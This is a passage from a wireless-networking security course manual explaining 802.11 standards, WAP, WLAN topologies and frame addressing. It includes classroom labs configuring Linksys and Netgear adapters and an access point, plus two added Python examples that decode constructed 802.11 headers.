As wireless networking came on the scene, and the 802.11 standard was available, there were only a few economies (such as the United States, Europe, and Japan) that had regulations on the use of the radio waves. In order for wireless networking to become global, standards would be required that comply with regulation of transmissions in various countries. The 802.11d working group is focused on the international regulations for the use of wireless networking.
802.11e
An important issue in all of networking is Quality of Service (QoS). By ensuring high QoS, transmitting other types of information such as audio and video can be accomplished through a wireless network. The 802.11e group is working on standards to prioritize network traffic through the wireless network, to improve QoS. 802.11e addresses the MAC layer, and as such it will be compatible with all 802.11 PHY networks.
802.11f
The development of the original 802.11 standard did not address the communications between individual access points. This was done to provide for the maximum flexibility in an enterprise implementing various vendors' products. This causes difficulty though, when there are many different types of vendor equipment in the network, that may have different methods of communicating. 802.11f is working to define the standards of communication between access points so that roaming wireless clients do not experience network problems, or have communications cut off. It is suggested that until this standard is complete, and all vendors comply, that you should use a single vendor to provide your wireless infrastructure.
802.11g
A problem that developed during the initial standards process was that 802.11a and 802.11b did not communicate. So, although the ability to add the higher bandwidth of 802.11a was appealing to some, the lack of interoperability discouraged others. 802.11g provides the standards to provide higher speed, while being able to interoperate with other wireless networks. 802.11g utilizes OFDM to manage communications, provides for transmission rates of up to 54 Mbps, and operates in the 2.4 GHz range.
Lesson 9: Securing Wireless Networks 461
802.11h
Specific European regulatory issues are discussed in the 802.11h working group. In Europe, there is a strong possibility that 802.11a devices, which operate in the 5 GHz range, will interfere with satellite communications, which are designated as primary use. Many European countries label wireless networking as secondary use.
802.11i
There are serious security issues associated with wired equivalent privacy (WEP). The 802.11i working group was designed to address these issues. The result of the group's efforts is a stronger security standard, including all the options that exist in Wi-Fi Protected Access (WPA), and adding the use of the Advanced Encryption Standard (AES). Some, including the Wi-Fi Alliance, refer to 802.11i as WPA2.
802.11n
With the ever-growing demands on wireless networks, speed is always an issue. The 802.11n working group develops enhancements to wireless networking technologies to achieve a higher throughput. The speed estimates put this standard at a 200+ Mbps rate. Through the use of multiple antennas, some vendors are claiming speeds in the 400+ Mbps range.
Wireless Application Protocol
The Wireless Application Protocol (WAP), detailed at the Wapforum (www.wapforum.org), is a specification that is open and utilized globally. Handheld devices, such as mobile phones, pagers, and PDAs, can interact with networks, such as the Internet through WAP. It is compatible with many wireless networking technologies including Code Division Multiple Access (CDMA), Time Division Multiple Access (TDMA), and Global Systems for Mobile Communications (GSM).
Since WAP is a protocol and application environment, it has the ability to be built into any operating system that is designed to use it. It is currently used in operating systems such as: WindowsCE, PalmOS, JavaOS, and OS/9.
Mobile devices work by using WAP microbrowsers that are built into the device. These are similar to the full-scale Internet browsers, such as Netscape and Internet Explorer, only scaled down to the minimum requirements. Many mobile devices can communicate via HTML and/or XML, but there is a language specifically for the wireless devices. That language is called Wireless Markup Language (WML). WML is based on XML, and web content accessed via WML will have the .wml extension, similar to the .html extension of web pages.
The programming of WML looks very similar to that of HTML or XML. There are in fact XML tags in WML pages. The following code example shows what two WML cards look like in a WML deck:
Note: As of this writing, there were an estimated 855 million worldwide GSM users, 162 million CDMA users, and 124 million TDMA users.
Note: Web pages written in WML are called decks, and decks are constructed using cards.
<wml>
<card id="no1" title="Card 1">
<p>Hello World!</p>
</card>
<card id="no2" title="Card 2">
<p>This is the second card text!</p>
</card>
</wml>
WAP itself, like all specifications, has gone through several versions since it was first introduced. WAP v1.0 was introduced in April 1998, WAP v1.1 in June 1999, WAP v1.2 in November 1999, and WAP v2.0 in the summer of 2001. The 1.0 version of WAP used a WAP gateway, often a separate computer to act as the literal gateway between the WAP client and the web server hosting the files.
Figure 9-11: The original WAP architecture.
In the original WAP architecture, protocol conversion was required at the WAP gateway. This is due to the WAP devices not speaking the language of the Internet. With WAP v2.0 devices, the gateway protocol conversion is not required. This is due to devices running the WAP v2.0 stack being able to utilize TCP/IP, and speak through a proxy to the Internet.
Figure 9-12: The two common stacks of WAP.
TASK 9A-2
Choosing a Wireless Media
1. You have been contracted to design the wireless network for your new client. This client has three offices, all within the same two-block radius. They are three independent offices, each in a multistory building, which do not require frequent resource access to any of the other offices. The only authorized communications that can be sent from one office to another are email or other approved instant messages.
There are some slight obstructions, such as trees, that prevent perfect line-of-sight between all three buildings. You have asked the client, and have been informed that removal of the trees is not permitted.
Based on this information, which media type will you recommend to the client, and why?
You will recommend using radio waves as the media, by configuring the networks to use radio waves and a directional antenna, such as a yagi, to increase the strength and range. The radio wave option should provide the client with an inexpensive solution.
Topic 9B
Wireless LAN (WLAN) Fundamentals
WLANs are built upon the 802.11 standards and are designed to operate similarly to their wired counterparts, running the 802.3 (Ethernet) standard. One difference (other than the lack of those pesky wires!) is that 802.11 networks use Carrier Sense Multiple Access/Collision Avoidance (CSMA/CA), whereas the 802.3 networks use Carrier Sense Multiple Access/Collision Detection (CSMA/CD).
In the CSMA/CD networks, the nodes listen to the wire to see if it is clear to transmit. Since the 802.11 nodes are not on a single physical media like the 802.3 networks, CSMA/CD will not work. Instead, the WLANs use CSMA/CA where each node sends a short broadcast preceding each transmission.
The Access Points
The AP is the device that the end nodes in the network communicate with. Placement of the AP can have a significant effect on the overall speed and transmission in the WLAN. If the AP is placed near a source of high EMI, then the network will be negatively affected. Likewise, the height of the AP may have an effect.
For many network administrators, the AP placement is a process of trial and error. First decide on the placement as best you can by analyzing the layout, trying to avoid anything that will cause interference. After the AP is placed, run bandwidth tests from various locations, where the end nodes will likely be located. Then, move the AP to a different location, perhaps moving it higher on the wall, and run the bandwidth tests again. After you have run a group of tests, you will know the optimal placement for your unique situation.
SSID
Wireless networks have a component called the Service Set Identifier, or SSID. The SSID is a 32-character unique identifier that gets attached to the header of WLAN packets. The SSID is designed to identify individual WLANs, so that devices connect to the proper WLAN.
This is a value that should be configured upon setting up security on a WLAN. The default SSIDs of many manufacturers are well known, and changing this value to one that is not well known is one of your initial steps in your WLAN security.
Access Points are configured, usually by default, to broadcast their SSID in what are called beacon frames. This function allows authorized users to find their proper WLAN easily, but also informs any attacker of the name of the WLAN segment. The beacon frames are broadcast in plaintext; there is no encryption of these transmissions. Most WLAN analyzing software will listen for SSID beacon frames, and report that information back, making the location of the networks simple. If your network will allow for it, you should turn off the SSID beacon frame broadcast.
Association
A unique aspect of the wireless network is that nodes that are going to use an access point must first associate with an access point. In the wired network, the node is simply turned on and plugged into the cable; there is no association required for the local hub or switch. In the wireless network, the node must be turned on, and then associate with, or join, a wireless access point.
This process of association is accomplished by the wireless node knowing what its SSID value is, and looking for an SSID value that matches its known value. The vast majority of network cards now include an option that scans the local radio waves and lists the possible networks that the WNIC can attempt to associate with. It is an attempt to associate first; the WNIC must be authenticated as well, and then association can be successful.
Authentication
One step in the WLAN client being able to use the WLAN is association, but that may not be enough. The second step that may be required in the network is authentication. Authentication can happen in one of two general methods, as per the IEEE 802.11 specification: open system authentication and shared-key authentication.
Open system authentication is simply when there is no encryption and all communication is done in clear text. The WLAN client can authenticate in the open system without having to know any key information. In the shared-key authentication system, a key is required, and the key system must be used on both ends of the communication, meaning both the AP and the WLAN client must be using the same system.
WLAN Topologies
When building your WLAN, you have two major types of networks to build. You can build a WLAN in either ad-hoc mode or in infrastructure mode. Neither of these topologies is right or wrong; they just have different functions.
Ad-hoc Mode
The ad-hoc is perhaps the fastest WLAN to build. No APs are required for the ad-hoc mode WLAN. In this case, you install and configure the wireless network card on multiple end nodes, and they all have the ability to interact directly with any other node. This is a true peer-to-peer network with no single point in control.
Note: Association is the process of a WLAN client associating with an AP in the WLAN.
Figure 9-13: An example of an ad-hoc WLAN configuration.
When you group several end nodes together in the ad-hoc mode, those nodes create what is called an Independent Basic Service Set (IBSS). These nodes are grouped together by all using the same SSID.
Infrastructure Mode
Although the ad-hoc mode may be the fastest for you to set up, it is not likely the mode you will use in a production environment. In the enterprise, you are much more likely to use the infrastructure mode. In the infrastructure mode, your network clients are configured with the SSID of an AP. All the clients who are going to be grouped together have the same SSID. The AP then acts as the central point in the network.
The request of each node is received by the AP, and then transmitted to the network. If you have a single AP, that does not overlap with any other WLAN segments, then you have created a Basic Service Set (BSS). You can create an Extended Service Set (ESS) by grouping BSSs to form a single subnetwork.
Just about all APs that are made today have at least one Ethernet port on them, allowing you to seamlessly connect your wired clients into your wireless network. You will usually connect the Ethernet port of the AP to a hub, switch, or other network connecting device.
Figure 9-14: An example of an infrastructure mode WLAN configuration.
Lesson Configuration
There is quite a bit of hardware used in this lesson. For the tasks and screenshots there were multiple WNICs and APs used, and both ad-hoc and infrastructure mode will be used. For this lesson, there are two configured clients, one Linksys WPC54G and one Netgear WPN824, used in laptop computers.
Prepare for the Ad-hoc Network
The first network type you will configure is an ad-hoc network. This will allow for a small network to be established in a very short amount of time. This first network will not have security running, and can be viewed as a guide of the steps required to get an ad-hoc network operational. In this first task, you will configure the Linksys 54G card, which can run 802.11b and 802.11g.
Note: As most of the machines you will configure wireless networking upon will be clients, these tasks have been written using laptops running Windows XP. For the SCP certifications, questions about the wireless networks are based on the wireless tools and techniques shown here, not on the built-in Windows wireless networking solution.
TASK 9B-1
Installing the Linksys WPC54G WNIC
Setup: This task is performed on the first Windows XP laptop.
1. Log on to Windows XP Professional.
2. Insert the Linksys WPC54G setup CD-ROM into the CD-ROM drive. If the setup program does not autorun, navigate to the CD, and double-click the Setup.exe file.
3. In the Linksys Welcome screen, click the Click Here To Start button.
4. Read the License Agreement, and click Next. The setup files will now be installed to your computer.
5. When prompted, insert the WNIC into the computer, then click Next.
6. The Linksys Available Wireless Network screen will open. Click the Manual Setup button to create a profile.
7. Select the Specify Network Settings radio button:
In the IP Address text box, type: 10.0.10.30
In the Subnet Mask text box, type: 255.255.255.0
In the Default Gateway text box, type: 10.0.10.1
8. Leave the DNS text boxes blank, and click Next.
9. Select the Ad-Hoc Mode radio button.
10. In the SSID text box, type Ad_Hoc_1 and click Next.
11. In the Channel drop-down list, select Channel 3 and click Next.
12. In the Security drop-down list, select Disabled and click Next. (You will add security features later in the lesson.)
13. Confirm your settings are correct, and click Save.
14. Verify your IP Address settings via Windows Networking. Note, on some systems the Linksys configuration tool will not configure the Windows IP settings. In this case you will be required to manually configure the WNIC.
IP: 10.0.10.30 / 24 DG: 10.0.10.1
15. Leave the screen open, as you will return to it shortly.
Configure the Second WNIC
For the ad-hoc network to function, you need at least two WNICs to communicate with each other. Now that you have installed and configured one single node in the network, you need to configure a second node. Once both are configured properly, then the ad-hoc network can begin.
TASK 9B-2
Installing the Netgear WPN511
Setup: This task is performed on the second Windows XP laptop.
1. Log on to Windows XP Professional.
2. Insert the Netgear WPN511 CD-ROM into the CD-ROM drive. If the setup program does not autorun, navigate to the CD, and double-click the autorun.exe file.
3. In the Netgear SmartWizard screen, click the Install Software button.
4. In the Welcome screen, click Next.
5. Read the License Agreement, and click Accept.
6. Accept the default Destination Folder, and click Next. The setup files will now be copied to your computer.
7. Once the software installation is complete, click Next. The setup files will finish their installation.
8. Insert your Netgear WPN511 card into your computer, and click Next.
9. In the Country drop-down list, select your country, and click Agree.
10. Keep the default selection to use the Netgear Smart Wizard for your wireless connection, and click Next.
11. Select the No, I Want To Configure It Myself radio button, and click Next.
12. Choose Start > All Programs > Netgear WPN511 Smart Wizard > Netgear Smart Wizard. The tool to configure the Netgear WNIC will open.
13. In the Network Name text box, type Ad_Hoc_1
14. In the Network Type section, select the Computer-to-Computer (Ad Hoc) radio button.
15. Click the Initiate Ad Hoc button.
16. From the Channel drop-down list, select Channel 3 and click OK.
17. Click the Apply button.
18. Open the Windows Network Connections window, right-click the newly installed Netgear WNIC, and choose Properties.
19. Select Internet Protocol (TCP/IP), and click Properties.
20. Select the Use The Following IP Address radio button.
21. Enter the following configuration: IP 10.0.10.31, SM 255.255.255.0, DG 10.0.10.1, click OK, click Close, and close the Network Connections window.
22. In the Netgear WPN511 Smart Wizard window, select the Networks tab.
23. Select the Ad_Hoc_1 network, and click the Connect button. (If no network is listed, click the Find a Network button.)
24. Click the Apply button. You will be connected to the Ad_Hoc_1 network from this computer.
25. Leave the Wireless Network Connection window open for subsequent tasks.
Enable the Ad-Hoc Network
Now that you have both WNICs installed and the Netgear card is connected to the ad-hoc network, you simply need to connect the other side of the network. In the following task, you will connect the Linksys WNIC, thus enabling the ad-hoc network.
TASK 9B-3
Enabling the Ad-Hoc Network
1. Verify that you are at the computer with the Linksys WNIC installed.
2. In the Site Survey screen of the Linksys Network Monitor Tool, click the Refresh button. You should now see the Ad_Hoc_1 network available.
3. Select the Ad_Hoc_1 network, and click Connect.
4. Once connected, you will see that you have successfully joined the ad-hoc network.
5. Click the More Information button to see the details of this connection.
6. If you wish, open a command prompt and perform a ping test from one computer to the other to confirm the wireless network is functional.
802.11 Framing
Although you will likely never directly work with the design or physical architecture of any wireless network device, you do need a strong understanding of how the 802.11 network functions in order to implement solid networks. At first glance, it seems that the 802.11 network functions in the exact same way as the Ethernet networks. Upon further investigation you will notice that, although the appearance is the same, the 802.11 network has very real differences from the Ethernet network.
The Ethernet network framing is essentially to take the data, add a preamble, add the required addressing information, such as IP, and add an integrity check (or Frame Check Sequence) on the end. The wireless network however, must add more information than that. In the 802.11 network there are multiple frame types. The three 802.11 frame types are: data frames, control frames, and management frames.
The data frames are the frames that you will see on the network the most; these carry the actual data from one node to another. The control frames are for functions like carrier-sensing (like modems) and acknowledgement. The management frames are what a node uses to join (or associate) and to leave (or disassociate) an access point.
Frame Format
The first thing you will notice when looking at the 802.11 frame is that the MAC uses four address fields. Not every 802.11 frame uses all four fields, and the values assigned to the different address fields can change based on the type of MAC frame that is being transmitted.
Figure 9-15: The format of an 802.11 MAC frame.
Frame Details
Every 802.11 frame begins with a two-byte frame control field that is divided into several different subfields. One of the subfields is the protocol version. The protocol version subfield is a two-bit value, which indicates what version of the 802.11 MAC is found in the frame. Currently, there is only one supported version of the 802.11 MAC, and that has been given a protocol ID of 0.
Note: An in-depth discussion of the 802.11 framing format is beyond the scope of this course.
Figure 9-16: The frame control of the 802.11 frame, expanded showing its internal contents.
The second subfield is the type, which indicates which group of subtypes follows. If this is set to 00, then the frame is a management frame. If this is set to 01, then it is a control frame, and if this is set to 10, then it is a data frame. The third subfield is called the subtype, which is related to the type field just discussed. This subfield is a four-bit value, which indicates the subtype of the frame. Management subtypes are identified in the following table.
Management Subtype Value    Subtype Name
0000                        Association request
0001                        Association response
0010                        Reassociation request
0011                        Reassociation response
0100                        Probe request
0101                        Probe response
1000                        Beacon
1001                        Announcement traffic indication message
1010                        Disassociation
1011                        Authentication
1100                        Deauthentication
Using the table as reference, you can identify two common subtypes: the association request (0000), and the beacon (1000). Another subfield is the WEP field. When this is set to 1, WEP is in use, and when this is set to 0, WEP is not in use.
Note: The Beacon Subtype Value is 1000.
By now you have noticed that there are multiple entries for addresses in the frame format. The 802.11 frame can use up to four address fields, generally numbered one through four. Address field one is a receiver, address field two is a transmitter (or sender), address field three is filtering, and address field four is optional.
The sequence control field is used for multiple purposes. It uses 4 bits to manage fragmentation and 12 bits to manage sequence numbers. If a higher-level packet needs to be fragmented, the sequence number will be constant for all the fragments, but the 4-bit fragment number will increase by 1 for every new fragment.
The data field is where the upper layer payload goes for transmission. This field has a maximum payload value of 2304 bytes of data, and has a maximum size of 2312 bytes. The additional 8 bytes are to allow for the extra information required of WEP, which must be supported.
Finally, there is a frame check sequence (FCS) field. This is similar to the FCS in Ethernet and other networking systems. The FCS allows for an integrity check on the frame, but there is a difference in the wireless network. The difference in the 802.11 format is that there is no negative ACK if a frame fails the FCS. Instead the nodes must wait for an ACK timeout before they retransmit.
802.11 Addressing
As you saw earlier, there are four address fields in the frame, not all of which have to be used in each transmission. Before you can make a connection between an address and an address field, you need to be aware that there are multiple types of addresses in the 802.11 wireless networks. These addresses can be given the DA, RA, SA, and TA acronyms. Their definitions are as follows:
Destination Address (DA): This is the MAC address of the node that is to ultimately process the frame.
Receiving Address (RA): This is the MAC address of the node that will receive the frame. Note, this does not have to match the DA.
Source Address (SA): This is the MAC address of the node that created the frame.
Transmitting Address (TA): This is the MAC address of the node that transmitted the frame. Note, this does not have to match the SA.
The address fields will change based on the frame format. For example, the third field can hold the SSID address, the DA, or the SA, based on the frame. Where there is consistency is in the field that holds the transmitting address; this is address field two. Address field one is designed for the recipient of the frame, which you must note does not mean the final destination of the frame, only the recipient of the current frame.
When the network is in infrastructure mode, the address used is the SSID address. This is not the same as the SSID that has been manually assigned to the network, such as the default Linksys. The interface on the physical AP requires a MAC address, just as any other interface does. In Infrastructure mode, the SSID address is the MAC address of the AP that is participating in the Infrastructure network.
Note: The SSID used in the MAC address field is not the same as the manually entered SSID value.
One reason that there are multiple options here for the addressing is that there are multiple methods for establishing a wireless network. For example, in the most straightforward network, all the nodes simply talk directly to one another; this is the ad-hoc network. Another network could be where all the end nodes communicate only with the Access Point. Finally, you could link two (or more) wireless networks together, with the Access Point of each one functioning as a bridge to the other network.
Figure 9-17 identifies the addresses that would be assigned to each of the four address fields, and the DS settings, based on the function.
Figure 9-17: The settings of the address fields, based on the frame function.
From this figure, you can identify that the most basic addressing is in ad-hoc mode, where the frame has a simple DA and SA. This is the closest to the traditional Ethernet network that most network professionals are familiar with. Of note in this table are the configurations of the ToDS and FromDS bits. DS is the Distribution System, for example the Ethernet network that is connected to the wired side of an AP.
If both the ToDS and FromDS bits are set to 0, then the frame is on an ad-hoc network. When the ToDS is 1 and the FromDS is 0, this indicates a frame that is transmitted from a node to an infrastructure network. Conversely, when the ToDS is 0 and the FromDS is 1, this indicates a frame that is received for a node in an infrastructure network. Finally, when both the ToDS and FromDS are set to 1, then the frame is on a wireless bridge, from one wireless network to another.
Note: When the ToDS and FromDS are both set to zero, the frames are for a network running in ad-hoc mode.
Figure 9-18: The addressing of two nodes in an ad-hoc network.
When two nodes are communicating in ad-hoc mode, the addressing is clear-cut. The SSID is identified in the third address field, and the receiver and transmitter addresses are entered. This is the most straightforward of all the addressing options.
Figure 9-19: The addressing of two nodes and one AP in an infrastructure network.
In this second example (an infrastructure network), the addressing becomes more complex. When the two end nodes initiate their communication, the ToDS bit is set to 1 and the FromDS bit is set to 0, which indicates a frame sent to an infrastructure network. The address field one is the receiving address (RA), which is the SSID, and address field two is the source address (SA). In this case the node that originated the frame is the SA; this is because the frame is sent to the network, not directly to the end node. Notice that address field three is used; in this case it holds the destination address of the frame. The destination address is for the node that is to ultimately process the frame.
As the frames are moved from the AP to the respective end nodes, you can see that the ToDS bit is now set to 0 and the FromDS bit is now set to 1. This indicates the frame is intended for an end node, coming from the infrastructure network. Address field one now contains the address for the actual intended node that will process the frame. Address field two contains the SSID, where the frame was transmitted from, and address field three contains the source address, where the frame originated.
Figure 9-20: The addressing of frames in a wireless bridge network.
In the final addressing example, you have two APs in wireless bridge mode that are connecting two wireless networks. In this example, you have frames that are of different functions in the network. The node that started the transmission sends a frame that is in infrastructure mode, and is sent to the AP, with the final destination address in the third address field. When the frame gets to the AP, the network is in bridge mode between the two points, and the ToDS and FromDS are now both 1s. It is at this time that all the address fields are used, and it is here that the distinction between the transmitting and sending addresses, and between the receiving and destination addresses, is clear.
At the AP, with MACs 2345 and 3456, the frame has a receiving address of 4567, the MAC on the other side of the bridge. The final destination address is 6789; this is how the addressing makes the difference between a point receiving the frame, and the end node that is to finally process the frame. Also at the AP, the frame has a sending address of 1234, as that is where the frame originated, but the transmitting address is 3456, the AP that is sending the frame to the next access point.
When the frame is received at the second AP, the frame is then formatted as a frame in infrastructure mode, with the ToDS set to 0 and the FromDS set to 1. This frame is then sent to the node that will process the frame, and the series of frames are complete. In the event that a response to the original sender is required, the same process will happen, only in reverse.
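To make the frame control subfields and the ToDS/FromDS address roles concrete, the following decoder is added here as an example; it is not code from the course or from any vendor tool. It assumes the standard 802.11 header layout (frame control, duration, three addresses, sequence control, and a fourth address only when both DS bits are set), and the sample frames are constructed, with MACs that echo the 1234/3456/4567/6789 labels used in the bridge discussion above.

```python
"""Decode an 802.11 MAC header the way Lesson 9 describes it.
Added example, not course code. The frames below are constructed; their
MACs end in the 1234/3456/4567/6789 labels used in the bridge discussion.
"""
import struct

FRAME_TYPES = {0b00: "management", 0b01: "control", 0b10: "data"}

# Management subtypes from the lesson's table (frame control type 00).
MGMT_SUBTYPES = {
    0b0000: "Association request", 0b0001: "Association response",
    0b0010: "Reassociation request", 0b0011: "Reassociation response",
    0b0100: "Probe request", 0b0101: "Probe response",
    0b1000: "Beacon", 0b1001: "Announcement traffic indication message",
    0b1010: "Disassociation", 0b1011: "Authentication",
    0b1100: "Deauthentication",
}

# Roles of address fields 1..4 per ToDS/FromDS combination (data frames).
# "BSSID" is the AP's wireless MAC, what the lesson calls the SSID address.
ADDRESS_ROLES = {
    (0, 0): ("RA = DA", "TA = SA", "BSSID"),
    (1, 0): ("RA = BSSID", "TA = SA", "DA"),
    (0, 1): ("RA = DA", "TA = BSSID", "SA"),
    (1, 1): ("RA", "TA", "DA", "SA"),
}

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_frame_control(fc):
    """Split the 2-byte frame control field. It is sent low byte first:
    byte 0 = version (2 bits), type (2), subtype (4); byte 1 = flag bits,
    of which ToDS (bit 0), FromDS (bit 1) and WEP/Protected (bit 6) matter."""
    b0, b1 = fc[0], fc[1]
    return {
        "version": b0 & 0b11,
        "type": (b0 >> 2) & 0b11,
        "subtype": (b0 >> 4) & 0b1111,
        "to_ds": b1 & 1,
        "from_ds": (b1 >> 1) & 1,
        "wep": (b1 >> 6) & 1,
    }

def decode_header(frame):
    """Return the MAC header fields at the start of `frame` as a dict."""
    if len(frame) < 24:
        raise ValueError("an 802.11 MAC header is at least 24 bytes")
    fc = parse_frame_control(frame[0:2])
    duration = struct.unpack_from("<H", frame, 2)[0]
    addrs = [frame[4:10], frame[10:16], frame[16:22]]
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]  # 4-bit frag + 12-bit seq
    header_len = 24
    if fc["to_ds"] and fc["from_ds"]:  # wireless bridge: address 4 is present
        if len(frame) < 30:
            raise ValueError("ToDS and FromDS both set but address 4 is missing")
        addrs.append(frame[24:30])
        header_len = 30
    kind = FRAME_TYPES.get(fc["type"], "reserved")
    roles = ADDRESS_ROLES[(fc["to_ds"], fc["from_ds"])]
    return {
        "type": kind,
        "subtype": MGMT_SUBTYPES.get(fc["subtype"]) if kind == "management" else fc["subtype"],
        "to_ds": fc["to_ds"], "from_ds": fc["from_ds"], "wep": bool(fc["wep"]),
        "duration": duration,
        "fragment": seq_ctrl & 0xF, "sequence": seq_ctrl >> 4,
        "addresses": [(role, mac_str(a)) for role, a in zip(roles, addrs)],
        "header_len": header_len,
    }

# Constructed, locally administered MACs echoing the labels in Figure 9-20.
NODE_1234 = bytes.fromhex("020000001234")  # node that originates the frame
AP_3456 = bytes.fromhex("020000003456")    # first AP, wireless side
AP_4567 = bytes.fromhex("020000004567")    # second AP, other end of the bridge
NODE_6789 = bytes.fromhex("020000006789")  # node that finally processes the frame
BROADCAST = bytes.fromhex("ffffffffffff")

def build_header(fc_bytes, addr1, addr2, addr3, seq, frag=0, addr4=b""):
    """Assemble a constructed header; the duration field is left at 0."""
    seq_ctrl = struct.pack("<H", (seq << 4) | (frag & 0xF))
    return fc_bytes + b"\x00\x00" + addr1 + addr2 + addr3 + seq_ctrl + addr4

# Beacon: type 00, subtype 1000 (byte 0 = 0x80), both DS bits 0, to broadcast.
BEACON_FRAME = build_header(b"\x80\x00", BROADCAST, AP_3456, AP_3456, seq=1)
# Node-to-AP data frame with WEP in use: ToDS=1, FromDS=0, WEP bit set (0x41).
TO_AP_FRAME = build_header(b"\x08\x41", AP_3456, NODE_1234, NODE_6789, seq=5)
# Bridge hop between the two APs: ToDS=1, FromDS=1, all four addresses used.
BRIDGE_FRAME = build_header(b"\x08\x03", AP_4567, AP_3456, NODE_6789, seq=5,
                            frag=2, addr4=NODE_1234)

if __name__ == "__main__":
    for name, frame in [("beacon", BEACON_FRAME), ("to AP", TO_AP_FRAME),
                        ("bridge", BRIDGE_FRAME)]:
        print(name, decode_header(frame))
```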
In infrastructure mode, when a frame is sent to the AP, address field one
contains the SSID address.
In infrastructure mode, when a frame is sent from the AP, address field one
contains the destination address.
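To make the ToDS/FromDS address layouts described above concrete, here is an added Python example (not code from the course) that decodes an 802.11 data-frame MAC header and labels each address field by its role. The frames and MAC addresses are constructed, standing in for the 1234/3456/4567/6789 nodes in the text.

```python
"""Decode the MAC header of an 802.11 data frame and label its address fields.

Added example for the addressing discussion; the sample frames below are
constructed here and are not captures from the course network.
"""
import struct

# Roles of Address 1..4 for each (ToDS, FromDS) combination, as the text describes:
#   DA = destination, SA = source, RA = receiver, TA = transmitter,
#   BSSID = the AP's MAC (the text calls this the "SSID address").
ADDRESS_ROLES = {
    (0, 0): ("DA", "SA", "BSSID"),      # ad-hoc, station to station
    (1, 0): ("BSSID", "SA", "DA"),      # station to AP (infrastructure, ToDS)
    (0, 1): ("DA", "BSSID", "SA"),      # AP to station (infrastructure, FromDS)
    (1, 1): ("RA", "TA", "DA", "SA"),   # AP to AP (wireless bridge, all four used)
}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_header(frame: bytes) -> dict:
    """Return frame-control flags and the address fields keyed by their role."""
    fc, _duration = struct.unpack_from("<HH", frame, 0)
    flags = fc >> 8                      # second octet of Frame Control
    to_ds, from_ds = flags & 1, (flags >> 1) & 1
    frame_type = (fc >> 2) & 0x3         # 2 = data frame
    roles = ADDRESS_ROLES[(to_ds, from_ds)]
    need = 4 + 6 * 3 + 2 + (6 if len(roles) == 4 else 0)
    if len(frame) < need:
        raise ValueError(f"header truncated: need {need} bytes, have {len(frame)}")
    addrs = [frame[4:10], frame[10:16], frame[16:22]]
    if len(roles) == 4:
        addrs.append(frame[24:30])       # Address 4 follows the Sequence Control field
    return {
        "type": frame_type,
        "to_ds": to_ds,
        "from_ds": from_ds,
        "protected": (flags >> 6) & 1,   # Protected Frame bit: WEP/WPA applied to the body
        "addresses": {role: mac_str(a) for role, a in zip(roles, addrs)},
    }


def build_frame(to_ds: int, from_ds: int, addrs: list, protected: int = 0) -> bytes:
    """Assemble a constructed data-frame header (no body) for the examples below."""
    flags = to_ds | (from_ds << 1) | (protected << 6)
    fc = 0x08 | (flags << 8)             # first octet 0x08: type = data, subtype 0
    hdr = struct.pack("<HH", fc, 0) + b"".join(addrs[:3]) + struct.pack("<H", 0)
    if to_ds and from_ds:
        hdr += addrs[3]
    return hdr


def mac(hexstr: str) -> bytes:
    return bytes.fromhex(hexstr.replace(":", ""))


# Constructed MACs standing in for the text's 1234 / 3456 / 4567 / 6789 nodes.
NODE = mac("02:00:00:00:12:34")
AP1 = mac("02:00:00:00:34:56")
AP2 = mac("02:00:00:00:45:67")
END = mac("02:00:00:00:67:89")


def bridge_example() -> dict:
    """The bridge-mode frame from the text: AP1 relays the node's frame toward AP2."""
    frame = build_frame(1, 1, [AP2, AP1, END, NODE])
    return parse_header(frame)["addresses"]


if __name__ == "__main__":
    # The three legs of the bridged transmission described in the text.
    for to_ds, from_ds, addrs in [(1, 0, [AP1, NODE, END]),
                                  (1, 1, [AP2, AP1, END, NODE]),
                                  (0, 1, [END, AP2, NODE])]:
        print(parse_header(build_frame(to_ds, from_ds, addrs)))
```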
Lesson 9: Securing Wireless Networks 481
Access Point Configuration
In order for the network to evolve from an ad-hoc to an infrastructure network,
you need at least one AP. In this section, you will walk through the steps required
to configure an AP with basic settings. At this time, the goal is to create a simple
infrastructure network, running with one single AP, without WEP or any other
advanced configuration.
Most APs will have one of two methods of connecting and performing the initial
configuration. One of the methods is to connect a USB cable from the AP to a
computer that will run the configuration. A second method is to connect via a
network protocol, with the AP connected using a Cat5 cable instead of a USB
cable. This second method, of connecting through the network, generally through
a web browser, is becoming very common.
In this task, the steps for installing and configuring the first AP are shown. This
lesson has two different APs installed, and you will walk through the steps of
installing each AP. The Linksys AP requires a connection through the
192.168.1.0/24 network, so you must configure your computer to this network for
the initial communication.
TASK 9B-4
Installing the Linksys WAP54G Access Point
1. Log on to Windows 2003 Server as Administrator.
2. Open the Properties of your LAN adapter.
3. Select TCP/IP, and click Properties.
4. Enter the following IP Addressing information:
IP Address: 192.168.1.145
Subnet Mask: 255.255.255.0
Default Gateway: This may be left blank
5. Click OK twice, and then click Close.
6. Physically locate the WAP54G access point where you want it in the
room. If possible, this should be a high point in the room, and not near any
source of EMI.
7. Insert the Linksys CD-ROM into the CD-ROM drive. If the setup program
does not autorun, navigate to the CD, and double-click the Setup.exe file.
8. In the Welcome screen, click the Click Here To Start button.
9. Plug in the WAP54G power cord and plug in the supplied network
cable, then click Next.
10. Connect the WAP54G to the network, and click Next.
11. Connect the WAP54G to an outlet, and click Next.
482 Tactical Perimeter Defense
12. Verify all three LEDs are lit on the front panel, and click Next.
13. Note the status of the new AP, including the default IP Address, and click
Yes.
14. Type the default password of admin and click Enter. For ease of running
the course, you will leave the default password in place. In a production
environment, you would use a strong password here.
15. In the IP Address text box, type 10.0.10.1
16. In the Subnet Mask text box, type 255.255.255.0
17. Leave the Default Gateway text box empty. Once you have entered this
information, click Next.
18. In the Configure Wireless Settings window, click the Enter Wireless Setting
Manually button.
19. In the SSID text box, type SCP_1
20. Leave the Channel drop-down list on Channel 6.
21. In the Network Mode drop-down list, select G-only, then click Next.
22. At this time, you are not configuring Security options, so select the Disable
radio button, and click Next.
23. Confirm your settings, and click Yes.
24. Click Exit to close the Access Point configuration tool.
Configure the Infrastructure Clients
Once the AP is configured and running in the network, there need to be clients
connected to make the Infrastructure network functional. In this section, you will
reconfigure the client computers to associate with the AP, establishing the
infrastructure network. It is assumed that the initial installation of the clients has
been completed, and in these tasks, you will move directly to the client
configuration.
TASK 9B-5
Configuring the Linksys Client
1. Log on to the computer with the Linksys WPC54G installed.
2. In the Windows system tray, right-click the Linksys WPC54G monitor
icon, and choose Open The Monitor.
